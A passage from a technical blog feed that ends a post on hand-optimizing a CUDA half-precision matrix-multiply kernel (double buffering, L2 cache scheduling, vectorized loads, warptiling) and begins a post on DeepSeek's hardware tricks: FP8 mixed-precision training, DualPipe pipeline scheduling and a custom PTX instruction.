<p>The implementation uses dynamic shared memory (<code>extern __shared__ half smem[]</code>) to accommodate twice the storage required for each matrix tile. The total shared memory consumption increases to approximately 98 KB <code>(2 (BMBK+APAD) + BK(BN+BPAD)) sizeof(half))</code>, <a target="_blank" href="https://forums.developer.nvidia.com/t/question-about-max-shared-memory-in-block-and-multiprocessor/283345">which exceeds the default 48 KB shared memory limit per SM</a>. To enable this larger allocation, the kernel launch requires <code>cudaFuncSetAttribute(kernel, cudaFuncAttributeMaxDynamicSharedMemorySize, 98304)</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744355295837/f3973f24-892c-4c0b-b0b1-b1710fe05683.png" alt class="image--center mx-auto" /></p>
<p>`</p>
<p>The buffer management logic employs a clever bit manipulation technique to toggle between the buffers. The expressions <code>(bk &amp; 1) ^ 1</code> and <code>((bk - 1) &amp; 1) ^ 1</code> alternate between 0 and 1 on consecutive iterations, providing the offset multipliers for addressing the appropriate buffer. This technique avoids branching and ensures deterministic access patterns.</p>
<p>From a performance modeling perspective, double buffering transforms the execution time from a sequential model <code>T_total = T_memory + T_compute</code> to an overlapped model <code>T_total = max(T_memory, T_compute) + T_setup</code>, where <code>T_setup</code> represents the initial loading phase. This optimization is particularly effective when <code>T_memory</code> and <code>T_compute</code> are similar in magnitude, which is often the case in matrix multiplication operations at this scale.</p>
<h2 id="heading-cache-locality">Cache Locality</h2>
<p>The next optimization aims to improve locality in the L2 cache by changing how thread blocks are scheduled. This modification is particularly significant for large matrix dimensions:</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_localcache</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// ... (most of the code is same as before)</span>
    <span class="hljs-comment">// int bx = blockIdx.x; // Original</span>
    <span class="hljs-keyword">int</span> bx = blockIdx.z * gridDim.x + blockIdx.x; <span class="hljs-comment">// New version</span>
    <span class="hljs-keyword">if</span> (bx &gt;= N / BN || by &gt;= M / BM)
        <span class="hljs-keyword">return</span>;
    <span class="hljs-comment">// ... (rest of the kernel remains the same)</span>
}
</code></pre>
<p>And when launchi<a target="_blank" href="https://forums.developer.nvidia.com/t/question-about-max-shared-memory-in-block-and-multiprocessor/283345?utm_source=chatgpt.com">ng</a> the kernel:</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BM = <span class="hljs-number">128</span>, BN = <span class="hljs-number">256</span>, BK = <span class="hljs-number">32</span>;
<span class="hljs-function">dim3 <span class="hljs-title">blockDim</span><span class="hljs-params">(<span class="hljs-number">256</span>)</span></span>;
<span class="hljs-keyword">int</span> BX = (N + BN - <span class="hljs-number">1</span>) / BN;
<span class="hljs-keyword">int</span> BY = (M + BM - <span class="hljs-number">1</span>) / BM;
<span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> NSPLIT = <span class="hljs-number">4096</span>;
<span class="hljs-keyword">int</span> split_num = (N + NSPLIT - <span class="hljs-number">1</span>) / NSPLIT;
<span class="hljs-function">dim3 <span class="hljs-title">gridDim</span><span class="hljs-params">((BX + split_num - <span class="hljs-number">1</span>) / split_num, BY, split_num)</span></span>;
cudaFuncSetAttribute(hgemm_localcache, cudaFuncAttributeMaxDynamicSharedMemorySize, <span class="hljs-number">98304</span>);
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> dsmem = <span class="hljs-number">2</span> * (BM * (BK + <span class="hljs-number">8</span>) + BK * (BN + <span class="hljs-number">8</span>)) * <span class="hljs-keyword">sizeof</span>(half);
hgemm_localcache&lt;&lt;&lt;gridDim, blockDim, dsmem&gt;&gt;&gt;(a, b, c, M, N, K);
</code></pre>
<p>This modification changes the order in which thread blocks are scheduled, promoting better locality for matrices A and B in the L2 cache. The L2 cache locality optimization addresses a fundamental scheduling challenge in massively parallel matrix multiplication. By default, CUDA schedules thread blocks in a grid by incrementing the x-dimension first, then y, and finally z. This pattern works well for matrix A's spatial locality but leads to poor locality for matrix B when processing large matrices.</p>
<p>Consider a large matrix multiplication where C(16384×16384) = A(16384×16384) × B(16384×16384). With BM=128 and BN=256, the output matrix C is divided into 128×64 tiles. Traditional scheduling would process all the tiles in the first row of C (accessing corresponding rows of A and columns of B), then move to the second row, and so on. While this maintains good spatial locality for A (we reuse the same rows), we rapidly traverse different columns of B, leading to cache thrashing.</p>
<p>The modified scheduling introduces a parameter NSPLIT that changes how tiles are processed. Instead of traversing all N columns before moving to the next row, we process only NSPLIT/BN columns for each row before moving to the next row. This creates a more balanced access pattern that improves the spatial and temporal locality for both input matrices.</p>
<p>The optimal value for NSPLIT depends on hardware characteristics, particularly L2 cache size and matrix dimensions. Through empirical testing, NSPLIT=4096 was found to provide the best performance, likely because it balances the working set size to fit optimally in the L2 cache while maintaining sufficient parallelism.</p>
<p>This optimization is particularly effective for large matrices (approaching or exceeding 16384×16384 dimensions) where L2 cache misses become a significant performance bottleneck. For smaller matrices, the benefit is less pronounced as the working set already fits well in the cache hierarchy.</p>
<h2 id="heading-vectorized-memory-access">Vectorized Memory Access</h2>
<p>Next, we'll tackle two optimizations: transposing matrix A in shared memory to enable auto-vectorization of SMEM loads, and vectorizing all global memory accesses using explicit vector datatypes. First, let's look at the transposition of matrix A. By transposing A in shared memory, we can load data using vectorized SMEM loads (LDS.128 in SASS), which provides better memory access performance:</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Transpose A during the GMEM to SMEM transfer</span>
float4 tmp = <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;A[innerRowA * K + innerColA * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">0</span>) * BM + innerRowA] = tmp.x;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">1</span>) * BM + innerRowA] = tmp.y;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">2</span>) * BM + innerRowA] = tmp.z;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">3</span>) * BM + innerRowA] = tmp.w;

<span class="hljs-comment">// B doesn't need to be transposed, just vectorize the access</span>
<span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;Bs[innerRowB * BN + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>] = 
    <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;B[innerRowB * N + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
</code></pre>
<p>Looking at the assembly, we see that loading A into the registers, which used to be a 32b LDS load, is now also a 128b LDS.128 load, just like it had already been for B. This gives us approximately a 3% performance improvement.</p>
<p>Next, we vectorize all loads and stores from/to global memory using vector datatypes, specifically float4:</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Vectorized load from global memory using float4</span>
float4 tmp = <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;A[innerRowA * K + innerColA * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];

<span class="hljs-comment">// We transpose A during the transfer from global to shared memory</span>
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">0</span>) * BM + innerRowA] = tmp.x;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">1</span>) * BM + innerRowA] = tmp.y;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">2</span>) * BM + innerRowA] = tmp.z;
As[(innerColA * <span class="hljs-number">4</span> + <span class="hljs-number">3</span>) * BM + innerRowA] = tmp.w;

<span class="hljs-comment">// Vectorized load and store for matrix B</span>
<span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;Bs[innerRowB * BN + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>] = 
    <span class="hljs-keyword">reinterpret_cast</span>&lt;float4 *&gt;(&amp;B[innerRowB * N + innerColB * <span class="hljs-number">4</span>])[<span class="hljs-number">0</span>];
</code></pre>
<p>This leads to the 32b global memory load instructions (LDG.E) being replaced with 128b counterparts (LDG.E.128). Similarly, store operations also get vectorized.</p>
<p>The <code>reinterpret_cast</code> is used to promise the compiler that the float* pointers are 128b aligned, which is a requirement for using LDG.E.128. This is more efficient than manually unrolling the accesses because the compiler doesn't know that the pointer is aligned and can't use 128b loads otherwise.</p>
<h2 id="heading-warp-level-computation">Warp-Level Computation</h2>
<p>Our final optimization focuses on warptiling, which adds another level of hierarchy between blocktiling and threadtiling. While blocks and threads are explicit in CUDA, warps are an implicit hardware concept. A warp consists of 32 threads with consecutive thread IDs that execute in lockstep.</p>
<p>Warptiling explicitly organizes computation around the warp structure, aligning better with the GPU's execution model:</p>
<pre><code class="lang-cpp">__shared__ half s_a[BK][BK + BPAD];
__shared__ half s_b[BK][BN + BPAD];

<span class="hljs-comment">// Fragments: 3×2 grid per warp</span>
<span class="hljs-keyword">using</span> <span class="hljs-keyword">namespace</span> nvcuda::wmma;
fragment&lt;matrix_a, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, row_major&gt; frag_a;
fragment&lt;matrix_b, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, row_major&gt; frag_b;
fragment&lt;accumulator,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half&gt; frag_c[<span class="hljs-number">3</span>][<span class="hljs-number">2</span>];

<span class="hljs-comment">// Zero out all accumulator fragments</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
        fill_fragment(frag_c[i][j], <span class="hljs-number">0.0f</span>);
    }
}

<span class="hljs-comment">// Compute thread-specific load offsets (example values shown)</span>
<span class="hljs-keyword">int</span> load_a_smem_m = (tid % <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// A: row offset in shared memory</span>
<span class="hljs-keyword">int</span> load_a_smem_k = (tid / <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// A: col offset</span>
<span class="hljs-keyword">int</span> load_b_smem_k = (tid / <span class="hljs-number">32</span>) * <span class="hljs-number">8</span>; <span class="hljs-comment">// B: row offset in shared mem</span>
<span class="hljs-keyword">int</span> load_b_smem_n = (tid % <span class="hljs-number">32</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// B: col offset</span>
<span class="hljs-keyword">int</span> load_a_gmem_m = by * BM + load_a_smem_m;
<span class="hljs-keyword">int</span> load_b_gmem_n = bx * BN + load_b_smem_n;
<span class="hljs-comment">// (compute addresses in global memory for A and B here...)</span>
<span class="hljs-comment">// For brevity, assume we compute load_a_gmem_addr and load_b_gmem_addr properly</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
    <span class="hljs-comment">// Load a 64×BK tile of A into shared memory (each thread 4 elements)</span>
    <span class="hljs-keyword">if</span> (load_a_gmem_m &lt; M &amp;&amp; load_a_smem_k &lt; K) {
        <span class="hljs-comment">// e.g., s_a[load_a_smem_k][load_a_smem_m + (bk*BK)] = A[load_a_gmem_addr];</span>
    }
    <span class="hljs-comment">// Similarly load B tile into s_b...</span>
    __syncthreads(); 
    <span class="hljs-comment">// Compute 3×2 grid of WMMA multiplies</span>
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
        load_matrix_sync(frag_a, s_a[i], SA_STRIDE);
        load_matrix_sync(frag_b, s_b, SB_STRIDE);
        mma_sync(frag_c[i][<span class="hljs-number">0</span>], frag_a, frag_b, frag_c[i][<span class="hljs-number">0</span>]);
        mma_sync(frag_c[i][<span class="hljs-number">1</span>], frag_a, frag_b, frag_c[i][<span class="hljs-number">1</span>]);
    }
    __syncthreads();
    <span class="hljs-comment">// (swap buffers for double buffering, etc.)</span>
}
</code></pre>
<p>Warptiling is beneficial as it aligns with the warp scheduling unit of the GPU, improving utilization of warp schedulers. It also addresses shared memory bank conflicts by organizing memory accesses along warp boundaries and improves register cache locality, especially on recent GPU architectures. It also provides better mapping to warp-level matrix operations in future tensor core instructions</p>
<p>The warptiling implementation makes explicit all levels of parallelism:</p>
<ul>
<li><p>Blocktiling: Different blocks can execute in parallel on different SMs</p>
</li>
<li><p>Warptiling: Different warps can execute in parallel on different warp schedulers</p>
</li>
<li><p>Threadtiling: Instructions can execute in parallel via instruction-level parallelism</p>
</li>
</ul>
<p>To understand the exact benefits of our PTX optimizations, let's examine the assembly code for our key kernels. When profiling the naive implementation, we find that most executed instructions are memory loads:</p>
<pre><code class="lang-c">ld.shared.f32 %f91, [%r8+<span class="hljs-number">3456</span>];
ld.shared.f32 %f92, [%r7+<span class="hljs-number">108</span>];
fma.rn.f32 %f93, %f92, %f91, %f90;
</code></pre>
<p>In our PTX-optimized kernels, the <code>cp.async.ca.shared.global</code> instruction transforms into a series of vectorized loads at the SASS level:</p>
<pre><code class="lang-c">LDS R26, [R35.X4+<span class="hljs-number">0x800</span>] <span class="hljs-comment">// a 32b load from As</span>
LDS<span class="hljs-number">.128</span> R8, [R2]        <span class="hljs-comment">// a 128b load from Bs</span>
LDS<span class="hljs-number">.128</span> R12, [R2+<span class="hljs-number">0x20</span>]
LDS R24, [R35.X4+<span class="hljs-number">0x900</span>]
</code></pre>
<p>The vectorized shared memory access pattern is a key advantage of using PTX inline assembly, as it allows the compiler to generate more efficient SASS code. Similarly, our global memory access optimizations result in <code>LDG.E.128</code> instructions that fully utilize memory bandwidth.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>This is more of a basic overview of some low-level optimizations made with utilizing inline PTX ISA. But using PTX doesn’t necessarily mean that your code will automatically be supercharged. The modern NVCC compiler is so advanced that handwritten SASS code will likely have on par performance with handwritten PTX, except if you’re really good at writing it. The following HGEMM implementation didn’t even really surpass cuBLAS in any way, but it was a good thought exercise.</p>
]]></content:encoded></item><item><title><![CDATA[Deepseek's Low Level Hardware Magic]]></title><description><![CDATA[Cover Illustration by onigiriice

There has been alot of copium about Deepseek-R1 leapfrogging ChatGPT-o1 in benchmarks, with many accusing Deepseek either lying about their capabilities or sanction-busting US export controls. Moreover, the whole pan...]]></description><link>https://research.meekolab.com/deepseeks-low-level-hardware-magic</link><guid isPermaLink="true">https://research.meekolab.com/deepseeks-low-level-hardware-magic</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 05 Feb 2025 16:36:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1738776004390/048b8403-9055-4d86-bd91-828b49379142.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> onigiriice</p>
</blockquote>
<p>There has been alot of copium about Deepseek-R1 leapfrogging ChatGPT-o1 in benchmarks, with many accusing Deepseek either lying about their capabilities or sanction-busting US export controls. Moreover, the whole panic is making people believe that NVIDIA no longer has a technical moat and we will all be running chinese GPUs soon.</p>
<p>Picking some knowledge from my unpublished article about crafting different SGEMM implementations and also some light reading in Zhihu and CSDN (frankly i was doing chinese mode before it was cool), I wanna quickly compile about the ways that Deepseek manages to carve efficiency gains from last-gen NVIDIA hardware. This will mainly focus on hardware optimizations, not architecture efficiencies with the model.</p>
<h1 id="heading-american-hardware-restrictions">American Hardware Restrictions</h1>
<p>Alot has been said about American export restrictions on AI chips, but what do they actually restrict for exports? When people talk about export restrictions, they are likely mentioning the Export Control Classification Number (ECCN) 3A090, introduced with the 2022 CHIPS and Science Act. This rule specifically restricts the export of datacenter chips that meet specific performance thresholds and features to Chinese and Russian entities. For the sake of skipping over the government techno-babble, ECCN 3A090 contains a few restrictions.</p>
<ul>
<li><p><strong>Total Processing Performance (TPP)</strong></p>
<p>  The primary metric for controlling AI chips is defined as TPP = 2 × MacTOPS × bit_length_operation, where MacTOPS measures multiply-accumulate operations per second and bit length refers to the numerical precision of operations (e.g., FP16, FP32).</p>
</li>
<li><p><strong>Performance Density</strong></p>
<p>  Performance density is calculated as TPP divided by die area in square millimeters. This metric prevents circumvention through die size manipulation and accounts for miniaturization and efficiency improvements.</p>
</li>
<li><p><strong>Memory Bandwidth</strong></p>
<p>  Memory bandwidth controls specifically target implementations using High Bandwidth Memory (HBM) and similar advanced memory architectures. These restrictions focus on memory bandwidth density thresholds, which are particularly relevant for AI accelerators utilizing stacked memory configurations. This category recognizes that memory bandwidth is often a key performance bottleneck in AI computation.</p>
</li>
<li><p><strong>Transfer Rate Controls</strong></p>
<p>  Transfer rate restrictions apply to chips with an aggregate bidirectional transfer rate of ≥600 GB/s across all inputs and outputs, excluding volatile memory. This threshold covers both actual and programmable capabilities, including interfaces like PCIe and NVLink. The controls apply regardless of whether the transfer rate is achieved through a single interface or multiple combined interfaces.</p>
</li>
</ul>
<p>So this shows that Deepseek does not only need to work through limitations in chip processing power, but also feature-set limitations that are specifically designed to prevent the aggregation of chips via the limitation of inter-chip bandwidth and networking capabilities.</p>
<p>There is alot of speculation (and even misinformation) about how Deepseek actually managed to squeeze performance out of the NVIDIA chips it still has, but alot of the information here is actually told in <a target="_blank" href="https://arxiv.org/pdf/2412.19437">Deepseek-V3’s technical report</a> paper which is the base model for Deepseek-R1.</p>
<h1 id="heading-mixed-precision-training">Mixed Precision Training</h1>
<p>Mixed precision training has been a popular way for Chinese LLM developers to work with chip restrictions. A notable implementation is with the Tencent Hunyuan-Large model, which utilized mixed precision training with <a target="_blank" href="https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/Hunyuan-A52B-Pretrain/config.json#L46">the bfloat16 format</a> which was introduced by <a target="_blank" href="https://cloud.google.com/blog/products/ai-machine-learning/bfloat16-the-secret-to-high-performance-on-cloud-tpus">Google Brain in 2019</a>. bfloat16 (BF16) represents a 16-bit variant of the conventional IEEE 754 single-precision floating-point format (FP32).</p>
<p>While maintaining the dynamic range of FP32, BF16 features a truncated significand compared to FP16, enabling both memory efficiency and accelerated computation. Papers have show that mixed precision training can achieve up to <a target="_blank" href="https://pytorch.org/blog/accelerating-training-on-nvidia-gpus-with-pytorch-automatic-mixed-precision/">2.5x acceleration</a> compared to full-precision training using FP32 on high-performance GPU architectures such as the NVIDIA A100. But the key advancement in DeepSeek-V3 is solving mixed-precision using FP8 on large-scale model training, which has been notoriously unstable.</p>
<p>Their implementation is a fine-grained quantization strategy that works at both tile and block levels to extend the dynamic range of the FP8 format. For activations, they implement tile-wise grouping with 1 × Nc elements, while for weights they use block-wise grouping with Nc × Nc elements. This granular approach to quantization helps mitigate the impact of outliers by adapting the scale according to smaller groups of elements, rather than using a global scaling factor.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738580859286/4e8dbf55-df99-4b68-8f63-1cf935cb4394.png" alt class="image--center mx-auto" /></p>
<p>The framework maintains most compute-dense operations in FP8, particularly the General Matrix Multiplication (GEMM) operations. These GEMM operations accept FP8 tensors as inputs and produce outputs in either BF16 or FP32 format. All three GEMMs associated with the Linear operator - forward pass (Fprop), activation backward pass (Dgrad), and weight backward pass (Wgrad) - are executed in FP8. This design theoretically doubles the computational speed compared to the original BF16 method.</p>
<p>DeepSeek recognizes that certain operators require higher precision due to their sensitivity to low-precision computations. They maintain the original precision (BF16 or FP32) for several components: the embedding module, the output head, MoE gating modules, normalization operators, and attention operators. This targeted retention of high precision ensures stable training dynamics.</p>
<p>To address the limited accumulation precision of FP8 GEMM on NVIDIA H800 GPUs (around 14 bits), DeepSeek implements a promotion to CUDA cores for higher precision. During Matrix Multiply-Accumulate (MMA) execution on Tensor Cores, intermediate results are accumulated using the limited bit width. Once an interval of Nc is reached, these partial results are copied to FP32 registers on CUDA cores, where full-precision FP32 accumulation is performed. Setting Nc = 128 elements, equivalent to 4 Warpgroup-level Matrix Multiply-Accumulates (WGMMAs), represents the minimal accumulation interval that significantly improves precision without substantial overhead.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738580161482/096ae0fb-12ca-4b09-8351-1aba2b3911b1.png" alt class="image--center mx-auto" /></p>
<p>In contrast to hybrid FP8 formats used in <a target="_blank" href="https://arxiv.org/pdf/2209.05433">Micikevicius et al. (2022</a>) (which use E4M3 in Fprop and E5M2 in Dgrad and Wgrad), DeepSeek adopts the E4M3 format universally. This is made possible by their fine-grained quantization strategy - by operating on smaller element groups, their methodology effectively shares exponent bits among grouped elements, mitigating the impact of limited dynamic range.</p>
<p>For calculating scale factors, DeepSeek employs online quantization rather than delayed quantization frameworks that maintain historical maximum absolute values. They calculate the maximum absolute value online for each 1x128 activation tile or 128x128 weight block, derive the scaling factor, and quantize to FP8 format immediately.</p>
<pre><code class="lang-python"><span class="hljs-meta">@triton.jit</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">act_quant_kernel</span>(<span class="hljs-params">x_ptr, y_ptr, s_ptr, BLOCK_SIZE: tl.constexpr</span>):</span>
    <span class="hljs-string">"""
    Quantizes the input tensor `x_ptr` and stores the result in `y_ptr` and the scaling factor in `s_ptr`.

    Args:
        x_ptr (triton.Pointer): Pointer to the input tensor.
        y_ptr (triton.Pointer): Pointer to the output tensor where quantized values will be stored.
        s_ptr (triton.Pointer): Pointer to the output tensor where scaling factors will be stored.
        BLOCK_SIZE (tl.constexpr): The size of the block to be processed by each program instance.

    Returns:
        None
    """</span>
    pid = tl.program_id(axis=<span class="hljs-number">0</span>)
    offs = pid * BLOCK_SIZE + tl.arange(<span class="hljs-number">0</span>, BLOCK_SIZE)
    x = tl.load(x_ptr + offs).to(tl.float32)
    s = tl.max(tl.abs(x)) / <span class="hljs-number">448.</span>
    y = x / s
    y = y.to(y_ptr.dtype.element_ty)
    tl.store(y_ptr + offs, y)
    tl.store(s_ptr + pid, s)


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">act_quant</span>(<span class="hljs-params">x: torch.Tensor, block_size: int = <span class="hljs-number">128</span></span>) -&gt; Tuple[torch.Tensor, torch.Tensor]:</span>
    <span class="hljs-string">"""
    Quantizes the input tensor `x` using block-wise quantization.

    Args:
        x (torch.Tensor): The input tensor to be quantized. Must be contiguous and its last dimension size must be divisible by `block_size`.
        block_size (int, optional): The size of the blocks to be used for quantization. Default is 128.

    Returns:
        Tuple[torch.Tensor, torch.Tensor]: A tuple containing:
            - The quantized tensor with dtype `torch.float8_e4m3fn`.
            - A tensor of scaling factors with dtype `torch.float32`.
    """</span>
    <span class="hljs-keyword">assert</span> x.is_contiguous(), <span class="hljs-string">'Input tensor must be contiguous'</span>
    <span class="hljs-keyword">assert</span> x.size(<span class="hljs-number">-1</span>) % block_size == <span class="hljs-number">0</span>, <span class="hljs-string">f'Last dimension size must be divisible by block_size (block_size=<span class="hljs-subst">{block_size}</span>)'</span>
    y = torch.empty_like(x, dtype=torch.float8_e4m3fn)
    s = x.new_empty(*x.size()[:<span class="hljs-number">-1</span>], x.size(<span class="hljs-number">-1</span>) // block_size, dtype=torch.float32)
    grid = <span class="hljs-keyword">lambda</span> meta: (triton.cdiv(x.numel(), meta[<span class="hljs-string">'BLOCK_SIZE'</span>]), )
    act_quant_kernel[grid](x, y, s, BLOCK_SIZE=block_size)
    <span class="hljs-keyword">return</span> y, s
</code></pre>
<p>For optimizer states, they adopt BF16 instead of FP32 to track first and second moments in the AdamW optimizer. However, master weights and gradients are retained in FP32 to ensure numerical stability throughout training. Similarly, for activation caching during backward passes, inputs of the Linear after the attention operator use a custom E5M6 data format, while inputs of the SwiGLU operator in MoE are stored in FP8 with their fine-grained quantization method.</p>
<p>For communication in MoE operations, activations are quantized to FP8 before MoE up-projections, compatible with FP8 Fprop in MoE up-projections. A similar strategy applies to activation gradients before MoE down-projections. Forward and backward combine components are maintained in BF16 to preserve training precision in critical parts of the pipeline.</p>
<h1 id="heading-bidirectional-pipeline-scheduling">Bidirectional Pipeline Scheduling</h1>
<p>Bidirectional pipeline parallelism can be traced back to the 2021 paper "<a target="_blank" href="https://arxiv.org/pdf/2107.06925">Chimera: Efficiently Training Large-Scale Neural Networks with Bidirectional Pipelines</a>" by Torsten Hoefler and Shigang Li from ETH Zurich. The bidirectional pipeline with cross-arrangement can reduce the bubble rate but doubles the memory usage for weights.</p>
<p>Despite efficiency gains, major parallel computing libraries like Megatron, Deepspeed, and Colossal AI haven't implemented it. They mostly stick to the simpler 1F1B (one forward, one backward) approach. Moreover, it was later superseded by other PP improvements. In 2021-2022, few organizations were training models at such large scales.</p>
<p>Doubling model weights in memory was impractical when attention training wasn't bottlenecked by sequence length. Unlike today's common 8k+ token pretraining, activation memory was a smaller concern then. With limited GPU resources, increasing batch size for better throughput was preferable to doubling memory usage.</p>
<p>But unlike other pipeline parallel approaches, DualPipe employs a bidirectional pipeline scheduling strategy that feeds micro-batches simultaneously from both ends of the pipeline. This approach significantly reduces pipeline bubbles - periods where hardware goes unused. The algorithm divides each chunk into four primary components: attention, all-to-all dispatch, MLP, and all-to-all combine. For backward chunks, both attention and MLP are further split into two parts: backward for input and backward for weights. The boundaries of transformer blocks in these chunks are intentionally misaligned to enable optimal overlapping.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737906261702/7a25b8bd-f782-4b29-a9e2-02ef1a448c4b.jpeg" alt class="image--center mx-auto" /></p>
<p>The pipeline bubbles in DualPipe are mathematically expressed as:</p>
<p>$$\left(\frac{PP}{2} - 1\right)(F\&amp;B + B - 3W)$$</p><p>where PP represents pipeline parallel size, F&amp;B denotes the execution time of two mutually overlapped forward and backward chunks, B represents the execution time of a full backward chunk, and W denotes the execution time of a "backward for weights" chunk.</p>
<p>DualPipe's bidirectional pipeline scheduling feeds micro-batches simultaneously from both ends of the pipeline. In a system with 8 pipeline ranks and 20 micro-batches, the scheduling creates symmetrical batch processing patterns. The micro-batches in the reverse direction mirror those in the forward direction, with shared black borders indicating mutually overlapped computation and communication.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737913271894/c2669bfa-bc1d-4c2b-b49a-32b8ada67044.jpeg" alt class="image--center mx-auto" /></p>
<p>The memory efficiency of DualPipe requires storing 2 x PP + 1 compared to PP activations in traditional approaches. While DualPipe does maintain two copies of model parameters, this overhead is minimized in the context of large expert parallelism. Unlike other approaches like <a target="_blank" href="https://arxiv.org/pdf/2107.06925">Chimera</a>, DualPipe only requires pipeline stages and micro-batches to be divisible by 2, not requiring micro-batches to be divisible by pipeline stages.</p>
<p>The scheduling mechanism ensures that communication operations (dispatch and combine) for one micro-batch overlap with computation operations (attention and MLP) of another. This overlap extends to both all-to-all communication for expert parallelism and pipeline parallel communication. By maintaining computation-communication overlap at scale, DualPipe enables DeepSeek to employ fine-grained experts across nodes while effectively eliminating all-to-all communication overhead.</p>
<p>In the paper, Deepseek mentioned that</p>
<blockquote>
<p>Although DualPipe requires keeping two copies of the model parameters, this does not significantly increase the memory consumption since we use a large EP size during training. Compared with Chimera (Li and Hoefler, 2021), DualPipe only requires that the pipeline stages and micro-batches be divisible by 2, without requiring micro-batches to be divisible by pipeline stages. In addition, for DualPipe, neither the bubbles nor activation memory will increase as the number of micro-batches grows</p>
</blockquote>
<p>DeepSeek's DualPipe innovates by combining Zero Bubble Pipeline Parallelism, which splits backward passes into separate input gradient and weight gradient computations, with Chimera's approach of using two parallel streams of computation. This combination allows more efficient scheduling as while one stream is doing forward computations, the other stream can simultaneously perform backward computations.</p>
<p>The real breakthrough comes with how this dual-stream approach handles the all-to-all communication needed for Mixture-of-Experts (MoE) models. When using just a single stream, all-to-all communication for forward and backward passes must happen sequentially. But with dual streams, DualPipe can perform forward pass communication in one stream at the same time as backward pass communication in the other stream. This overlapping of communication dramatically improves efficiency, as the GPU isn't left waiting for one communication phase to finish before starting another.</p>
<h1 id="heading-the-magic-ptx-instruction">The Magic PTX Instruction</h1>
<p>In Deepseek’s recent open source week, it had released its implementation of its intra-GPU communication kernel tailored for MoE training and inference. In the <a target="_blank" href="https://arxiv.org/pdf/2412.19437">paper</a>, Deepseek mentions</p>
<blockquote>
<p>Specifically, we employ customized PTX (Parallel Thread Execution) instructions and auto-tune the communication chunk size, which significantly reduces the use of the L2 cache and the interference to other SMs.</p>
</blockquote>
<p>And it seems that Deepseek finally revealed the “customized PTX instruction” that they mentioned in the Deepseek-V3 paper, saying that its an “out-of-doc” instruction.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636571112/6c800eb2-bc11-4329-8267-18c4b0e54f0f.png" alt class="image--center mx-auto" /></p>
<p>But a later edit to the readme later corrected this. It later elaborated that its a “behavior-out-of-doc” instruction, and not an undocumented one.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636631467/650bcaec-73af-4d13-acdd-37d79dce243d.png" alt class="image--center mx-auto" /></p>
<p>This was later again edited to provide more clarity.</p>
